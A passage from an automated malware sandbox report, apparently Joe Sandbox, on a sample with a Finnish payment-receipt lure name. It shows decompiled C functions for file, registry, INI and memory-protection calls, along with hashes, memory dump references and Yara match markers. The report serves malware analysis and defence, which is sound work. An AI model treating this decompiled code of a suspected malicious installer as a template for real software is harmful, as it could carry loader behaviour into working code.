                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileMove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3562171763-0
                                                                                                                      • Opcode ID: 807174f0af3c157c7931e78b1e1949061bb11e52585001499c54eef0016aa6a5
                                                                                                                      • Instruction ID: cad2bc101cc9b1bd25101b07fb13f8df210b8e2a6e84e2c3711288d22c68260e
                                                                                                                      • Opcode Fuzzy Hash: 807174f0af3c157c7931e78b1e1949061bb11e52585001499c54eef0016aa6a5
                                                                                                                      • Instruction Fuzzy Hash: FFF0E93160811497DB20BBB54F0DE5F61649F963A8F24073FF051F22E1DABD891295AF
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 33%
                                                                                                                      			E004027E9(intOrPtr __edx, void* __eflags) {
                                                                                                                      				long _t8;
                                                                                                                      				long _t10;
                                                                                                                      				LONG* _t12;
                                                                                                                      				void* _t14;
                                                                                                                      				intOrPtr _t15;
                                                                                                                      				void* _t17;
                                                                                                                      				void* _t19;
                                                                                                                      
                                                                                                                      				_t15 = __edx;
                                                                                                                      				_push(ds);
                                                                                                                      				if(__eflags != 0) {
                                                                                                                      					_t8 = E00402C15(2);
                                                                                                                      					_pop(_t14);
                                                                                                                      					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                                                                                                      					_t10 = SetFilePointer(E00406310(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                                                                                      					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                                                                                      						_push(_t10);
                                                                                                                      						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                                                      						E004062F7();
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}










                                                                                                                      0x004027e9
                                                                                                                      0x004027e9
                                                                                                                      0x004027ea
                                                                                                                      0x004027f2
                                                                                                                      0x004027f7
                                                                                                                      0x004027f8
                                                                                                                      0x00402807
                                                                                                                      0x00402810
                                                                                                                      0x00402a61
                                                                                                                      0x00402a62
                                                                                                                      0x00402a65
                                                                                                                      0x00402a65
                                                                                                                      0x00402810
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327478801-0
                                                                                                                      • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                      • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                                                                                      • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                      • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00402306(int __eax, WCHAR* __ebx) {
                                                                                                                      				WCHAR* _t11;
                                                                                                                      				WCHAR* _t13;
                                                                                                                      				void* _t17;
                                                                                                                      				int _t21;
                                                                                                                      
                                                                                                                      				_t11 = __ebx;
                                                                                                                      				_t5 = __eax;
                                                                                                                      				_t13 = 0;
                                                                                                                      				if(__eax != __ebx) {
                                                                                                                      					__eax = E00402C37(__ebx);
                                                                                                                      				}
                                                                                                                      				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
                                                                                                                      					_t13 = E00402C37(0x11);
                                                                                                                      				}
                                                                                                                      				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
                                                                                                                      					_t11 = E00402C37(0x22);
                                                                                                                      				}
                                                                                                                      				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
                                                                                                                      				_t21 = _t5;
                                                                                                                      				if(_t21 == 0) {
                                                                                                                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}







                                                                                                                      0x00402306
                                                                                                                      0x00402306
                                                                                                                      0x00402308
                                                                                                                      0x0040230c
                                                                                                                      0x0040230f
                                                                                                                      0x00402314
                                                                                                                      0x00402319
                                                                                                                      0x00402322
                                                                                                                      0x00402322
                                                                                                                      0x00402327
                                                                                                                      0x00402330
                                                                                                                      0x00402330
                                                                                                                      0x0040233d
                                                                                                                      0x004015b4
                                                                                                                      0x004015b6
                                                                                                                      0x00402885
                                                                                                                      0x00402885
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 390214022-0
                                                                                                                      • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                      • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                                                      • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                      • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(091D1166,?,091D18FD,091D18FD,?,091D1166,?,?,?,?,?,00000000,00000005,00000206), ref: 091D6D7D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 35d86b1787a127d6e64756cb09f78bfc81564f84f89f924b9fee1a2c41a8cc0d
                                                                                                                      • Instruction ID: d7a5042f0a2bc978d21d982ba37125d980fd6c19dd67470d1d126fa7f1c76961
                                                                                                                      • Opcode Fuzzy Hash: 35d86b1787a127d6e64756cb09f78bfc81564f84f89f924b9fee1a2c41a8cc0d
                                                                                                                      • Instruction Fuzzy Hash: D3E012B5200208ABDB14EF89CC44EA777ACAF89654F418058FA099B281C630F910CAF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,00000000), ref: 091D6DBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 389ea324db55789009dfbd2dfe09bce6c38484e17a95f35a61ae741bed111e43
                                                                                                                      • Instruction ID: 1ffea5420f16bbce11cc101eb0fec5a36e4dd946473b387e75ee96ebee246e56
                                                                                                                      • Opcode Fuzzy Hash: 389ea324db55789009dfbd2dfe09bce6c38484e17a95f35a61ae741bed111e43
                                                                                                                      • Instruction Fuzzy Hash: 5BE012B5200208ABDB14EF89CC48EA77BACAF89650F018054FA089B291D630E910CAF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0040624B(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                      				void* _t7;
                                                                                                                      				long _t8;
                                                                                                                      				void* _t9;
                                                                                                                      
                                                                                                                      				_t7 = E004061A2(_a4,  &_a12);
                                                                                                                      				if(_t7 != 0) {
                                                                                                                      					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                      					return _t8;
                                                                                                                      				}
                                                                                                                      				_t9 = 6;
                                                                                                                      				return _t9;
                                                                                                                      			}






                                                                                                                      0x00406255
                                                                                                                      0x0040625e
                                                                                                                      0x00406274
                                                                                                                      0x00000000
                                                                                                                      0x00406274
                                                                                                                      0x00406262
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                      • Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                      • Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405F54(void* _a4, void* _a8, long _a12) {
                                                                                                                      				int _t7;
                                                                                                                      				long _t11;
                                                                                                                      
                                                                                                                      				_t11 = _a12;
                                                                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                      					return 0;
                                                                                                                      				} else {
                                                                                                                      					return 1;
                                                                                                                      				}
                                                                                                                      			}





                                                                                                                      0x00405f58
                                                                                                                      0x00405f68
                                                                                                                      0x00405f70
                                                                                                                      0x00000000
                                                                                                                      0x00405f77
                                                                                                                      0x00000000
                                                                                                                      0x00405f79

                                                                                                                      APIs
                                                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004102F7,0040CED0,004033C2,0040CED0,004102F7,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3934441357-0
                                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                      • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                      • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405F25(void* _a4, void* _a8, long _a12) {
                                                                                                                      				int _t7;
                                                                                                                      				long _t11;
                                                                                                                      
                                                                                                                      				_t11 = _a12;
                                                                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                      					return 0;
                                                                                                                      				} else {
                                                                                                                      					return 1;
                                                                                                                      				}
                                                                                                                      			}





                                                                                                                      0x00405f29
                                                                                                                      0x00405f39
                                                                                                                      0x00405f41
                                                                                                                      0x00000000
                                                                                                                      0x00405f48
                                                                                                                      0x00000000
                                                                                                                      0x00405f4a

                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                      • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                      • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      
                                                                                                                      				 *0x10004048 = _a4;
                                                                                                                      				if(_a8 == 1) {
                                                                                                                      					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                                                                                      					 *0x1000405c = 0xc2;
                                                                                                                      					 *0x1000404c = 0;
                                                                                                                      					 *0x10004054 = 0;
                                                                                                                      					 *0x10004068 = 0;
                                                                                                                      					 *0x10004058 = 0;
                                                                                                                      					 *0x10004050 = 0;
                                                                                                                      					 *0x10004060 = 0;
                                                                                                                      					 *0x1000405e = 0;
                                                                                                                      				}
                                                                                                                      				return 1;
                                                                                                                      			}



                                                                                                                      0x100027cb
                                                                                                                      0x100027d0
                                                                                                                      0x100027e0
                                                                                                                      0x100027e8
                                                                                                                      0x100027ef
                                                                                                                      0x100027f4
                                                                                                                      0x100027f9
                                                                                                                      0x100027fe
                                                                                                                      0x10002803
                                                                                                                      0x10002808
                                                                                                                      0x1000280d
                                                                                                                      0x1000280d
                                                                                                                      0x10002815

                                                                                                                      APIs
                                                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                      • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                      • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00402348(short __ebx) {
                                                                                                                      				short _t7;
                                                                                                                      				WCHAR* _t8;
                                                                                                                      				WCHAR* _t19;
                                                                                                                      				void* _t21;
                                                                                                                      				void* _t24;
                                                                                                                      
                                                                                                                      				_t7 =  *0x40a010; // 0xa
                                                                                                                      				 *(_t21 + 8) = _t7;
                                                                                                                      				_t8 = E00402C37("true");
                                                                                                                      				 *(_t21 - 0x4c) = E00402C37(0x12);
                                                                                                                      				GetPrivateProfileStringW(_t8,  *(_t21 - 0x4c), _t21 + 8, _t19, 0x3ff, E00402C37(0xffffffdd)); // executed
                                                                                                                      				_t24 =  *_t19 - 0xa;
                                                                                                                      				if(_t24 == 0) {
                                                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                      					 *_t19 = __ebx;
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}








                                                                                                                      0x00402348
                                                                                                                      0x0040234f
                                                                                                                      0x00402352
                                                                                                                      0x00402362
                                                                                                                      0x00402379
                                                                                                                      0x0040237f
                                                                                                                      0x00401751
                                                                                                                      0x00402853
                                                                                                                      0x0040285a
                                                                                                                      0x0040285a
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfileString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1096422788-0
                                                                                                                      • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                                                      • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                                                                      • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                                                                      • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0040621D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                      				void* _t7;
                                                                                                                      				long _t8;
                                                                                                                      				void* _t9;
                                                                                                                      
                                                                                                                      				_t7 = E004061A2(_a4,  &_a12);
                                                                                                                      				if(_t7 != 0) {
                                                                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                      					return _t8;
                                                                                                                      				}
                                                                                                                      				_t9 = 6;
                                                                                                                      				return _t9;
                                                                                                                      			}






                                                                                                                      0x00406227
                                                                                                                      0x0040622e
                                                                                                                      0x00406241
                                                                                                                      0x00000000
                                                                                                                      0x00406241
                                                                                                                      0x00406232
